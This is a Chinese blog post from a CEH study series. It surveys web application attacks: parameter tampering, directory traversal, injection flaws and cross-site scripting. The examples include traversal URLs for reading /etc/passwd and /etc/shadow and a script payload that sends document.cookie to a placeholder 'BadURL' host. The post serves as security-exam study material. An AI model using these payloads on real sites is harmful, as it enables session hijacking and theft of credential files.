2018 iT 邦幫忙鐵人賽

DAY 25

0

Security

CEH 之越挫越勇系列第 26 篇

[Day25]入侵網站-概念篇

2018鐵人賽

2017-12-30 21:50:18

6502 瀏覽

分享至

入侵網站(Hacking Web Application)

Web App Threats

輸入的內容未驗證(Unvalidated Input)

修改參數(Parameter / Form Tampering)

篡改參數(Tampering with the URL parameters)
http://URL/UserID=100 => http://URL/UserID=200
其他參數可以改變，包含屬性參數(Other parameters can be changed including attribute parameters)
http://URL/Status=View => http://URL/Status=Delete

跨目錄攻擊(Directory Taraversal)

建議關閉 IIS 中選項「Directory Browsing」
或是伺服器設定不正確：Apache中設定檔中的indexes拿掉即可。

未限制存取權限(access restricted directories)
利用參數弱點(manipulate variables) "../"
http://URL/file
http://URL/../../../../etc/passwd
http://URL/../../../../etc/shadow

安全性配置(Security Misconfiguration)

易於利用(Easy Exploitation)
流行普遍(Common Prevalence)
常見範例(Example)

注入弱點(Injection Flaws)

SQL Injection

利用 SQL 語法造成的弱點

Command Injection

利用系統指令造成的弱點

Shell Injection
HTML Injeciton
File Injection

LADP Injection

輕型目錄訪問協定(Lightweight Directory Access Protocol)
主要目的是利用跳脫字元繞過登入驗證：
「=」、「>=」、「<=」、「~=」、「*」、「AND(&)」、「OR(|)」、「NOT(!)」

跨站攻擊(Cross-Site Scripting)

反射型(Reflected XSS)
儲存型(Stored XSS)
DOM-Base XSS
- 偷 Cookie
  http://URL/index.php?ID=<Ｓcript>document.location=http://BadURL/get?c=document.cookie<／Ｓcript>

[Day24]入侵主機-實作篇

[Day26]SQL Injection

系列文

CEH 之越挫越勇共 34 篇

目錄

RSS系列文訂閱系列文

132 人訂閱

完整目錄

直播研討會

{{ item.subject }}

{{ item.channelVendor }} {{ item.webinarstarted }} |

{{ formatDate(item.duration) }}

直播中

尚未有邦友留言

立即登入留言

參賽組數

1064 組

團體組數

40 組

累計文章數

22196 篇

完賽人數

602 人

15th鐵人賽 16th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 11th鐵人賽鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# windows server linux css react vue.js

IT邦幫忙